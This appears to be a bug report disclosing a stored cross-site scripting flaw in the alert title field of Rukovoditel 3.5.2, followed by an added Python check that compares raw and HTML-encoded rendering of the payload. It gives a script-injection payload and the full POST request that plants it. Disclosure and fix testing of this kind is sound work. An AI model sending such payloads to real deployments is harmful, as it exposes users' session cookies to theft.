I found an XSS vulnerability in the users_alerts module.
In the title parameter when creating an alert for all users, you can insert a payload.
Payload: "/><script>alert(document.cookie)</script>.
Request:
POST /index.php?module=users_alerts/users_alerts&action=save&id=1&token=QRVySyiI7t HTTP/1.1
Host: 192.168.0.15
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Content-Type: application/x-www-form-urlencoded
Cookie: [cookie]
Upgrade-Insecure-Requests: 1

form_session_token=QRVySyiI7t&is_active=1&type=warning&title=qwerty%22%2F%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3Eqwerty&description=qwerty&location=all&start_date=2024-04-08&end_date=2024-04-10&users_groups%5B%5D=0&users_groups%5B%5D=6&assigned_to%5B%5D=1&assigned_to%5B%5D=2
I have used Rukovoditel 3.5.2
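
A regression check for the fix, as an added example that is not part of the original post and not Rukovoditel code: it decodes the `title` field from the request above, renders it with and without HTML encoding, and parses both results to see which elements a browser-style parser would build. The template (title echoed into an `<input>` value attribute) and all function names are assumptions made for illustration.

```python
from html import escape
from html.parser import HTMLParser
from urllib.parse import parse_qs

# Relevant fields of the form body from the report above (other fields omitted).
BODY = ("is_active=1&type=warning"
        "&title=qwerty%22%2F%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3Eqwerty"
        "&description=qwerty&location=all")

# Hypothetical template: assumes the stored title is echoed into an attribute value.
TEMPLATE = '<input type="text" name="title" value="{}">'


class TagCollector(HTMLParser):
    """Records each element the parser builds and the input's value attribute."""

    def __init__(self):
        super().__init__()
        self.tags = []
        self.value = None

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        if tag == "input":
            self.value = dict(attrs).get("value")


def render(title, encode):
    """Render the template, HTML-encoding the title (quotes included) if asked."""
    return TEMPLATE.format(escape(title, quote=True) if encode else title)


def parsed(markup):
    collector = TagCollector()
    collector.feed(markup)
    collector.close()
    return collector


def check(body=BODY):
    """Return the decoded title plus the parse of the raw and encoded renderings."""
    title = parse_qs(body)["title"][0]
    return title, parsed(render(title, encode=False)), parsed(render(title, encode=True))


if __name__ == "__main__":
    title, raw, safe = check()
    print("raw output builds:    ", raw.tags, "value =", repr(raw.value))
    print("encoded output builds:", safe.tags, "value =", repr(safe.value))
```

In PHP the corresponding output encoding is `htmlspecialchars($title, ENT_QUOTES, 'UTF-8')`, applied wherever the stored title is written into a page.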